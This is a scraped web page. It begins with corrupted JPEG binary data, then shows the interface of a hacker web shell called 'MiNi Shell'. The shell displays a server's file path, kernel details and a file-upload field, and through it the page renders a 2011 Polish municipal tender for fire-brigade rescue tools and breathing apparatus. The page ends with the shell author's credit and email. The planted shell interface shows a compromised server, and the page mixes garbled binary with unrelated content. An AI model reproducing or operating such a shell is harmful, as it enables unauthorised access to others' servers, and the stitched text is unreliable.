JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111128/400246-N-2011.html

<p class="kh_header"><b>Suraż: Dostawa zestawu ratownictwa drogowego, oraz aparatów oddechowych na potrzeby Ochotniczej Straży Pożarnej w Surażu</b><br>
<b>Numer ogłoszenia: 400246 - 2011; data zamieszczenia: 28.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Surażu , ul. 11 Listopada 16, 18-105 Suraż, woj. podlaskie, tel. 085 6503184, faks 085 6503184.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.suraz.wrotapodlasia.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa zestawu ratownictwa drogowego, oraz aparatów oddechowych na potrzeby Ochotniczej Straży Pożarnej w Surażu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Dostawa zestawu ratownictwa drogowego na potrzeby Ochotniczej Straży Pożarnej w Surażu (część I)
1.1.	Pompa hydrauliczna ze zwijadłami po bokach - 1 szt.
1.1.1.	maksymalne ciśnienie robocze nie mniejsze niż 2 x 720 bar
1.1.2.	ilość złączy 2
1.1.3.	wydajność I-go stopnia do 190 bar, nie mniejszym niż - 2x2565 (cm3/min)
1.1.4.	wydajność 2-go stopnia do 720 bar, nie mniejszym niż - 2x660 (cm3/min)
1.1.5.	silnik benzynowy 4-suwowy o mocy minimum 5KM
1.1.6.	możliwość pracy dwóch urządzeń niezależnie w tym samym czasie
1.1.7.	pojemność zbiornika paliwa nie mniejsza niżl400 cm3
1.1.8.	skuteczna pojemność zbiornika oleju nie mniejsza niż 4000 cm3
1.1.9.	waga pompy nie większa niż 85 kg
1.1.10.	układ hydrauliczny oparty na wężach ciśnieniowych wewnątrz węża powrotnego ze złączami umożliwiającymi odłączenie narzędzi bez wyłączenia przepływu oleju z pompy
1.1.11.	długość przewodów hydraulicznych minimum 20 m - 2szt. obustronnie zakończone szybkozłączami.

1.2.	Rozpieracz hydrauliczny
1.2.1.	Rozpieracz hydrauliczny oparty na wężach ciśnieniowych wewnątrz węża powrotnego ze złączami umożliwiającymi odłączenie narzędzi bez wyłączenia przepływu oleju z pompy (1 szt.)
1.2.2.	pojemność efektywna oleju nie mniejsza niż 143 cm3
1.2.3.	maksymalne ciśnienie robocze - 720 bar
1.2.4.	maksymalne rozparcie nie mniejsze niż - 680 mm
1.2.5.	maksymalna siła rozpierania przy otwartych ramionach nie mniejsza niż 206kN/21t
1.2.6.	maksymalna siła rozpierania przy zamkniętych ramionach 43kN/4,41 zgodnie z normą EN 13204: 25 mm od końcówek w całym zakresie rozpierania.
1.2.7.	maksymalna siła ściskania nie mniejsza niż 65kN/6,6t
1.2.8.	maksymalna siła ciągnięcia nie mniejsza niż 85 kN
1.2.9.	antypoślizgowy uchwyt z oświetleniem
1.2.10.	ciężar narzędzia gotowego do pracy nie większy niż 19,5 kg

1.3.	Nożyce hydrauliczne oparte na wężach ciśnieniowych wewnątrz węża powrotnego ze złączami umożliwiającymi odłączenie narzędzi bez wyłączenia przepływu oleju z pompy (1 szt)
1.3.1.	Maksymalne ciśnienie robocze nie mniejsze niż 720 bar
1.3.2.	Rozwarcie ostrzy min. 180 mm
1.3.3.	Siła cięcia min. 920 kN
1.3.4.	Uchwyt z wbudowanym oświetleniem
1.3.5.	Ciężar narzędzia - nie więcej niż 9kg

2.	Dostawa aparatów oddechowych na potrzeby Ochotniczej Straży Pożarnej w Surażu (4 kpl.) (część II)
2.1.	Butla kompozytowa o pojemności nie mniejszej niż 6,0 l
2.2.	Reduktor wysokiego ciśnienia przystosowany do pracy z ciśnieniem 200 lub 300 bar, wyposażony w drugie wyjście średniego ciśnienia
2.3.	Reduktor wyposażony w zawór bezpieczeństwa,
2.4.	Manometr wysokiego ciśnienia wyposażony w  wbudowany sygnalizator spadku ciśnienia.
2.5.	Noszak wykonany z tworzywa samo gaszącego się, wyposażony w uchwyty do przenoszenia aparatu oraz otwory do mocowania liny asekuracyjnej o wytrzymałości nie mniejszej niż 140 kg
2.6.	Panoramiczna maska pełnotwarzowa wyposażona w komorę foniczną i pół maskę. Wizjer wykończony powłoką antyzadrapaniową.
2.7.	Czujnik bezruchu

3.	Zakres zamówienia obejmuje:
3.1.	Dostawę sprzętu zgodnie z pkt. 1 i 2 niniejszego rozdziału
3.2.	Wykonawca musi posiadać lub dysponować serwisem dotyczącym danej części zamówienia na którą składa ofertę.
3.3.	Dostawca udzieli gwarancji licząc od dnia podpisania przez strony protokołu zdawczo - odbiorczego  min. 5 lat.
3.4.	Wykonawca zapewni w cenie dostawy przeprowadzenie szkolenia co najmniej 5 osób działających w ramach OSP Suraż w zakresie obsługi, eksploatacji i konserwacji sprzętu stanowiącego daną część zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.suraz.wrotapodlasia.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Surażu, ul. 11 Listopada 16, 18-105 Suraż, pokój Nr 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2011 godzina 13:00, miejsce: W sekretariacie Urzędu Miejskiego w Surażu, ul. 11 Listopada 16,18-105 Suraż (pokój nr 8).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane z dotacji Komendy Miejskiej Państwowej Straży Pożarnej w Białymstoku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa zestawu ratownictwa drogowego na potrzeby Ochotniczej Straży Pożarnej w Surażu (część I).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.	Pompa hydrauliczna ze zwijadłami po bokach - 1 szt.
1.1.1.	maksymalne ciśnienie robocze nie mniejsze niż 2 x 720 bar
1.1.2.	ilość złączy 2
1.1.3.	wydajność I-go stopnia do 190 bar, nie mniejszym niż - 2x2565 (cm3/min)
1.1.4.	wydajność 2-go stopnia do 720 bar, nie mniejszym niż - 2x660 (cm3/min)
1.1.5.	silnik benzynowy 4-suwowy o mocy minimum 5KM
1.1.6.	możliwość pracy dwóch urządzeń niezależnie w tym samym czasie
1.1.7.	pojemność zbiornika paliwa nie mniejsza niżl400 cm3
1.1.8.	skuteczna pojemność zbiornika oleju nie mniejsza niż 4000 cm3
1.1.9.	waga pompy nie większa niż 85 kg
1.1.10.	układ hydrauliczny oparty na wężach ciśnieniowych wewnątrz węża powrotnego ze złączami umożliwiającymi odłączenie narzędzi bez wyłączenia przepływu oleju z pompy
1.1.11.	długość przewodów hydraulicznych minimum 20 m - 2szt. obustronnie zakończone szybkozłączami.

1.2.	Rozpieracz hydrauliczny
1.2.1.	Rozpieracz hydrauliczny oparty na wężach ciśnieniowych wewnątrz węża powrotnego ze złączami umożliwiającymi odłączenie narzędzi bez wyłączenia przepływu oleju z pompy (1 szt.)
1.2.2.	pojemność efektywna oleju nie mniejsza niż 143 cm3
1.2.3.	maksymalne ciśnienie robocze - 720 bar
1.2.4.	maksymalne rozparcie nie mniejsze niż - 680 mm
1.2.5.	maksymalna siła rozpierania przy otwartych ramionach nie mniejsza niż 206kN/21t
1.2.6.	maksymalna siła rozpierania przy zamkniętych ramionach 43kN/4,41 zgodnie z normą EN 13204: 25 mm od końcówek w całym zakresie rozpierania.
1.2.7.	maksymalna siła ściskania nie mniejsza niż 65kN/6,6t
1.2.8.	maksymalna siła ciągnięcia nie mniejsza niż 85 kN
1.2.9.	antypoślizgowy uchwyt z oświetleniem
1.2.10.	ciężar narzędzia gotowego do pracy nie większy niż 19,5 kg

1.3.	Nożyce hydrauliczne oparte na wężach ciśnieniowych wewnątrz węża powrotnego ze złączami umożliwiającymi odłączenie narzędzi bez wyłączenia przepływu oleju z pompy (1 szt)
1.3.1.	Maksymalne ciśnienie robocze nie mniejsze niż 720 bar
1.3.2.	Rozwarcie ostrzy min. 180 mm
1.3.3.	Siła cięcia min. 920 kN
1.3.4.	Uchwyt z wbudowanym oświetleniem
1.3.5.	Ciężar narzędzia - nie więcej niż 9kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa aparatów oddechowych na potrzeby Ochotniczej Straży Pożarnej w Surażu (4 kpl.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Butla kompozytowa o pojemności nie mniejszej niż 6,0 l
2.	Reduktor wysokiego ciśnienia przystosowany do pracy z ciśnieniem 200 lub 300 bar, wyposażony w drugie wyjście średniego ciśnienia
3.	Reduktor wyposażony w zawór bezpieczeństwa,
4.	Manometr wysokiego ciśnienia wyposażony w  wbudowany sygnalizator spadku ciśnienia.
5.	Noszak wykonany z tworzywa samo gaszącego się, wyposażony w uchwyty do przenoszenia aparatu oraz otwory do mocowania liny asekuracyjnej o wytrzymałości nie mniejszej niż 140 kg
6.	Panoramiczna maska pełnotwarzowa wyposażona w komorę foniczną i pół maskę. Wizjer wykończony powłoką antyzadrapaniową.
7.	Czujnik bezruchu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com